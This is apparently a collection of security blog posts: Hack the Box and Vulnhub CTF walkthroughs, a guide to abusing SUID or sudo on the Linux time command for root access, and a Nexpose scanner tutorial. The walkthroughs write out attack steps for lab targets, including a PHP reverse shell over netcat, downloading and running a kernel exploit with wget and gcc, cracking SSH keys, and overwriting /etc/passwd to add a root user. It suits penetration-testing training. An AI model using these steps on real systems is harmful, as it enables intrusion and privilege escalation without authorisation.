Hack the Box: Help Walkthrough

Help is a recently retired CTF challenge VM on Hack the Box and the objective remains the same-- Capture the root flag. Hack the Box offers a wide range of VMs for practice from beginner to advanced level and it is great for penetration testers and researchers.

Level: Intermediate

Task: To find user.txt and root.txt file

Note: Since these labs are online available, therefore, they have a static IP. The IP of Help is 10.10.10.121

Penetration Methodology

Scanning

• Network Scanning (Nmap)

Enumeration

• Web Spidering (dirb)

Exploiting

• Analyzing behaviour of submit ticket script
• Uploading PHP shell and noting timestamp
• Converting shell+timestamp to md5 hash
• Finding shell on web server
• Getting reverse shell through netcat
• Reading user.txt

Privilege Escalation

• Finding kernel exploit of Linux 4.4.0 version.
• Compiling with GCC and escalating privilege
• Reading root.txt

Walkthrough

Scanning

Let’s start off with the most obvious step, that is nmap to check open ports.

nmap –A 10.10.10.121

Here I found port 22 for SSH, 80 and 3000 for HTTP are opened others were filtered

We immediately proceed towards port 80 when we see it open. But there was absolutely nothing on the homepage.

Enumeration

But maybe, there is some other directory which is set as a homepage for web application, so we won’t stop ourselves from directory enumeration with dirb.

dirb http://10.10.10.121

Here we found two directories, one is the javascript directory which seems of less use as per usual. But then there is another directory called /support which seemed interesting. We checked it on browser, and it seemed like a ticketing system.

Exploiting

Now, it is obvious that there will be a file upload option given in any ticketing system. And maybe, it is also possible that there is a vulnerability in the file upload mechanism.

We created a sample text file called demo.txt just to check whether the system is actually accepting uploads or not.

It seemed to be working fine!!

It successfully got uploaded and redirected us back to the homepage.

Now we tried enumerating the web server on a deeper level, but we couldn’t see our text file anywhere. It is possible that the php backend would have just renamed the file as per dev defined rules. Only if there was a way to check the code!

After googling HelpDeskZ, we found that the source code was available on github. And that could actually give us a closer look at the code of the upload script.

Now, in controllers/submit_ticket_controller.php, we found the code that was responsible for uploading a file on the server.

There are three interesting noteworthy things here:

1.       The file uploaded is going to “/support//tickets”

2.       There is no check on the type of file being uploaded! The error message is generated after file is already uploaded so it has no actual significance!

3.       File uploaded is being converted to a format: md5(shellname+ epoch timestamp) + .php

We are certain that it is infact epoch timestamp because of the working of “time()” function

So, it is pretty clear that we will upload a php reverse shell (we took pentester monkey’s reverse netcat php shell) and work towards exploiting this file upload vulnerability. But we were unable to find our text file a few minutes ago. Now that we know what the format of storing the file on web server is, let’s work our way towards manually creating an md5 hash.

For this, we need to know the current time on the web server. Our time zone could be way different than the server’s and to generate an exact timestamp, we upload a php shell while capturing the network request in developer tools in firefox.

Now that we had the time in GMT, we headed to www.epochconverter.com and converted this time into an epoch timestamp.

Now that we had obtained this timestamp, we could either write a short script in PHP that uses md5 hash function to generate the hash or we can simply open the php in interactive mode:

php –a

echo md5(“myshell.php1560956116”);

Your timestamp will vary than ours.

Now that it had given us a hash, all was left to do was to find it and open it in our browser, set a reverse nc connection and get shell.

And in the article above you can see that we know it is being uploaded to “/support//tickets” but the problem was we didn’t know what the name of upload directory is. Our best bet was going with the name “uploads” since we saw that folder name in the github files as well.

So, we set a reverse netcat listener and got a shell immediately! We spawned a proper TTY using python and read the user.txt file in home directory.

nc –lvp 1234

python –c ‘import pty;pty.spawn(“/bin/bash”)’

cd /home/help

cat user.txt

Privilege Escalation

Now for the privilege escalation part, we checked the kernel version with uname –a and found it to be vulnerable to a kernel exploit. We downloaded it using searchsploit and That made it super easy!

searchsploit 4.4.0-116

searchsploit –m 44398

python –m SimpleHTTPServer 8081

We changed the directory to tmp and downloaded this exploit using wget command, compile it with GCC and boom went the magic!

wget http://10.10.14.11:8081/44298.c

gcc 44298.c  –o kernel

./kernel

cd /root

And voila! That’s how we escalated privilege in Help CTF and read the congratulatory message under root directory in root.txt.

Linux for Pentester: Time Privilege Escalation

In this article, we’ll talk about Time command which is a linux utility and learn how helpful the time command is for Linux penetration testing and how we’ll progress time to scale the greater privilege shell.

Table of Contents

All About Linux Time Command

Major Operation Perform by Time

Abusing Time Utility

·         SUID Lab Setups for Privilege Escalation

·         Privilege Escalation

·         Sudo Lab Setups for Privilege Escalation

·         Privilege Escalation

All About Linux Time Command

The time command runs the specified program command with the given arguments.  When command finishes, time writes a message to standard error giving timing statistics about this program run.

These statistics consist of:

·         the elapsed real time between invocation and termination named as real.

·         the user CPU time named as user.

·         the system CPU time named as sys.

Time may exist in most cases as a stand-alone program (such as GNU time) or as a shell (such as sh, bash, tcsh, or zsh).

To identify all type of installed time program we run this:

type -a time

Here “time is a shell keyword” which means it a built-in keyword exist to bash whereas “time is /usr/bin/time” denotes it’s a binary that exist to GNU.

Major Operation Perform by Time

One can go with “help time” or “man time” commands to explore the summary to ensure why time command is used for?

Run Command

As said above, time command computes the timing statistics for any program run (pipeline’s execution). For example: To compute the time taken by date command

For Bash: time date

For GNU: /usr/bin/time date

/usr/bin/time -p date

As result you will notice, first it has run the date command and dump the complete date with time zone and then disclosed the time taken by date command as real, user CPU, system CPU time in seconds. While same information was dumped by using GNU with some extra information such as total INPUTS or OUTPUT.

Use -p options with /usr/bin/time for obtaining output into bash time.

Note: The real, user & system time will be zero for any program which would execute continuously because next time that program will be recalled from inside cache memory of the system.

Save Output

By default, time command displays the timing statistics for the program being executed at the end of its execution in the terminal but if you want to store the obtained timing statistics inside a file then you can go with -o options.

Syntax: /usr/bin/time -o [path of destination folder] command

/usr/bin/time -o /tm/ping ping google.com

cat /tmp/ping.txt

Verbose Mode

You can use -v option for verbose mode, here you can estimate the time acquired by the internal resources to produce output of the given input.

Formatting String

The format string generally comprises of ' resource specifiers ' combined with plain text by using a percent sign (`%’) as given below.

/usr/bin/time -f “Elaspsed Time = %E, Inputs %I, Outputs %O” head -4 /etc/passwd

You can use \n for new line to print the format string as shown the given screenshot.

/usr/bin/time -f “Elaspsed Time = %E \n Inputs %I \n Outputs %O” tail -5 /etc/passwd

Abusing Time Utility

SUID Lab Setups for Privilege Escalation

The SUID bit permission enables the user to perform any files as the ownership of existing file member. Now we are enabling SUID permission on time, so that a local user can take the opportunity of time as the root user.

Hence type following for enabling SUID bit:

which time

chmo u+s /usr/bin/time

ls -la /usr/bin/time

Privilege Escalation

Now we will start exploiting time service by taking the privilege of SUID permission. For this, I’m creating a session of the victim’s machine which will permit us to develop the local user access of the targeted system.

Now we need to connect with the target machine with ssh, so type the command:

ssh test@192.168.1.103

As we know we have access to victim’s machine so we will use find command to identify binaries having SUID permission.

find / -perm -u=s -type f 2>/dev/null

Here we came to recognize that SUID bit is permitted for so many binary files, but our concerned is:   /usr/bin/time.

Taking privilege of SUID permission on time we are going to grab the shadow’s file for extracting password hash file.

Now I have use john the ripper tool to crack the password hashes. By doing so we will get credential of the user as shown in below image.

john hash

Once we get the user’s credential then we can switch user. Here first we check sudo rights for user: raj and noticed that user “raj” has ALL privileges.

su raj

sudo -l

sudo su

Therefore, we switch to the root user account directly and access the root shell as shown in the image. Hence, we have successfully accomplished our task of using time utility for Privilege Escalation.

Sudo rights Lab setups for Privilege Escalation

Now here our next step is to set up the lab of Sudo rights or in other words to provide Sudo privileges to a user for time executable. Here we are going to add a user by the name of the test in the sudoers files and here we have given permission to user test to run /usr/bin/time as root user.

Privilege Escalation

Now we will connect through ssh in kali and after that, we will run sudo -l which is sudo list and through which we can see that user test has the permission to run /usr/bin/time as root user.

sudo -l

As we have seen above, that time command computes the time when a program run therefore, now taking advantage of time command.

sudo time /bin/sh

Conclusion: In this post we have talked on time command to demonstrate how an intrude can escalate the privilege using time utility due to permissions allowed on it.

Beginner’s Guide to Nexpose

In this article we’ll learn about Nexpose, which is used to scan a vulnerability network. There are various vulnerability scanners but the part that keeps it special is its smooth user interface and robust reporting options it offers, from the most common to the advance.

Table of Content

·         Introduction to Nexpose

·         Nexpose Virtual  Appliance Installation

·         Running Vulnerability Scans

·         Generating Reports

Introduction to Nexpose

Nexpose is one of the leading vulnerability assessment tools. It operates across physical, virtual, cloud and mobile environments to discover the active services, open ports, and running applications on each machine, and it tries to identifies vulnerabilities that may exists based on the attributes of the known services and applications. Though Nexpose discloses the results into scan reports, which helps to prioritize the vulnerabilities based on risk factor and determine the most effective solution to be implemented.

Some Important Nexpose terminologies

·         Assets - A host on a network.

·         Site - A logical group of assets that has a dedicated scan engine.

·         Scan Template - A template that defines the audit level that Nexpose uses to perform a vulnerability scan.

·         Local Scan Engine - Scan Engines are responsible for performing scan jobs on your assets.

Nexpose Virtual Appliance Installation

Let’s start the Nexpose installation over our Virtual Machine. From here we’ve downloaded the Nexpose VM. Firstly, we’ll add Nexpose in our VMware Workstation and power it ON.

As soon as it boots up, we’ll see our default login credentials - Username ( nexpose) and Password (nexpose). Furthermore, we have to set a new password according to the requirements (i.e it should be at least 14 characters long, at least one uppercase and a lowercase letter, a numeric number, and a special character.)

Afterwards, use the ifconfig command in your Nexpose to check our machine’s IP address so that we can log into the Nexpose’s web interface.

Now armed with the IP we need to set the HTTPS (i.e Hypertext Transfer Protocol over Secure Socket Layer) and the port 3780 is the Nexpose’s default port.

URL :  https://:3780

Though we’ll be greeted with a warning about a Security Certificate, therefore, to use Nexpose, we’ll have to get through this warning.  Click on Advanced, followed by Accept the Risk and Continue.

You will then be redirected to a login page, given the default username (nxadmin) and password (nxpassword), as shown in the image below.

Further, you’ll be asked for an activation Key, as shown in the image, provide the license key that you’ve received at your email address.

As soon as you’ve logged in and completed all the essential activations, the Nexpose Security Web Console page will activate and we’ll be able to perform any scan which we desire for, as shown:

Running Vulnerability Scans

In order to start with a new scan, go to the home page, click the Create dropdown and select Site. The Security Console will display the “Site Configuration” screen.

On the General tab, we have to give the name and describe our site, as in the above image. We can even set its importance from Very Low to Very High.

The Assets configuration page comprises of two sections: Include and Exclude.

In the Include section, we’ve provided our target IP address (i.e. 192.168.0.59) or if we want to scan the entire network, then we will have to provide the complete IP range (i.e. 192.168.0.1-254).

The section Exclude is used to exclude the IP from scanning. If we’re scanning the entire IP range and want to exclude some of the IPs from the scan, we just need to put them in the exclude assets section.

Now in the Authentication section, if we need to put any credentials, we can do that here. Basically, we conduct a credential-based scan by providing the system with a username and a password.

Afterwards, setup a particular Scan Template, as shown above, we’ve used the default Scan Template i.e. full Audit without Web Spider.

So now we have to select an engine for our scan, although we're selecting the Local Scan Engine, as shown in the picture above.

Now since we’ve completed all the required information to setup our site for a scan. To begin scanning, Click the Save and Scan button at the upper right corner of our Nexpose console panel.

Once the scan is completed, the result clearly indicates the number of possessed vulnerabilities, the risk score, and the duration of the scan.

Now we can see all the vulnerabilities mentioned along with their Common Vulnerability Scoring System (CVSS) score from the highest to the lowest over the Vulnerabilities tab. The exciting part is that one or more of these exploits have been published throughout the Exploit database and are vulnerable to many Metasploits.

When we click on a particular vulnerability, for an instance here we’ve clicked on MySQL  default account which is a critical threat, it will give us the information about the vulnerability such as its severity, whether it is password protected or not, its version, etc. as shown in the image below.

Generating Reports

Now we can generate the new records in the Reports tab by simply giving it a title, selecting the scan along with the template and the format in which we want our reports to be in.

Conclusion

This was the comprehensive guide of the usability of Nexpose a vulnerability scanner. Due to its GUI, it is user friendly and convenient. Therefore, it has become one of the best tools as it makes its place in corporate world with Nessus and retina.

Happycorp:1 Vulnhub Walkthrough

This is another post on vulnhub CTF “named as “HAPPYCORP:1” by Zayotic. It is design for VMware platform, and it is a boot to root challenge where you have to find flags to finish the task assigned by author.

You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/

Penetrating Methodologies

Scanning

·         Netdiscover

·         Nmap

Enumeration

·         NFS-Share

·         Mount share directory

·         Obtain user.txt -1^st flag

·         Obtain SSH key

·         Cracked SSH passphrase (john the ripper)

Exploiting

·         Login to SSH

·         Break jail (rbash shell)

Privilege Escalation

·         Abusing SUID Binary

·         Obtain flag.txt-2^nd flag

Walkthrough

Scanning

Let’s start with network scanning to identify the IP of VM with the help of netdiscover.

So, we have our target IP 192.168.1.104. Now, let’s scan the services and ports via nmap.

nmap -A 192.168.1.104

We have obtained the fruitful result from the nmap scan, as you can observe so many services are running on the various port. Such as 22: SSH, 80: HTTP and so on.

Enumeration

As we always navigate with HTTP services first, therefore we browse http://192.168.1.104 as the URL but found nothing interesting.

We found that network share service was also available on port 2049, so we thought to check shared directory in the network. We have therefore installed NFS-client on our local machine and have a command to identify the shared directory available to mount on our local computer.

showmount -e 192.168.1.104

we found /home/karl is a shared directory that we can mount in our local machine as given below:

mkdir /tmp/raj

mount 192.168.1.104:/home/karl /tmp/raj

cd /tmp/raj

ls -al

As I mount /home/karl in our /tmp/raj directory but I didn’t find anything here, truthfully when I try to open .ssh directory, it gave permission denied error,

Therefore, I add a user “aaru” in the a group that has GID of 1001 on my Kali machine and successfully access .ssh folder as shown in below steps (Same as approach was used in Lin-Security).

groupadd –gid 1001 aaru

useradd –uid 1001 –group raj aaru

Then access the our 1^st flag i.e. user.txt and moreover copies the id_rsa key in our local machine by executing following command:

sudo -u aaru ls -l .ssh

sduo -u aaru cat .ssh/user.txt

sduo -u aaru cat .ssh/id_rsa

Further I explored id _rsa.pub and authorized key where I noticed Karl@happycorp and realized that Karl could be the possible username for ssh login. Therefore, I used id_rsa key for login into ssh as karl but failed to login into it, as it required passphrase for key.

Then we have used ssh2john to convert this SSH key into a crackable file for John the ripper and further  used the rockyou.txt wordlist for johntheripper.

python ssh2john key > ssh_login

john –wordlist=/usr/share/wordlists/rockyou.txt crack.txt

After obtaining the passphrase “sheep” we changed the permission of RSA key and login as karl but unfortunately, we got access of restricted shell also known rbash as shell.

ssh -i key karl@192.168.1.104

Therefore, I tried to access bash shell directly though ssh by simply typing following:

ssh -i key karl@192.168.1.104 -t “/bin/sh”

Luckily it works and we have successfully access the proper shell.

Privilege Escalation

Now it’s time to escalate the root privilege and finish this task, therefore with help of find command I look for SUID enabled binaries where I found SUID bit is enabled for copy binary (/bin/cp).

find / -perm -u=s -type f 2>/dev/null

Hmm!! if suid bit is enabled on /bin/cp then we can copy any system file of root level or can overwrite the existing file.   First, I have explored the /etc /passwd file where karl was end user as shown in the below image and our vision is to edit this file by adding a new user.

On other hands, we have generated a new encrypted password: pass123 using OpenSSL passwd

openssl passwd -1 -salt ignite pass123

So, we have copied the whole content of /etc/passwd file in a text editor and then create a new record for user “ignite” that owns root level permissions. Saved this file as passwd and further used python server for transferring it into victim’s machine.

Inside /tmp folder we have downloaded our passwd file and with the help of copy command we have replaced the original /etc/passwd from ours file as shown below.

cd /tmp

wget http://192.168.1.111:8000/passwd

cp passwd /etc/passwd

su ignite

cd root

cat root.txt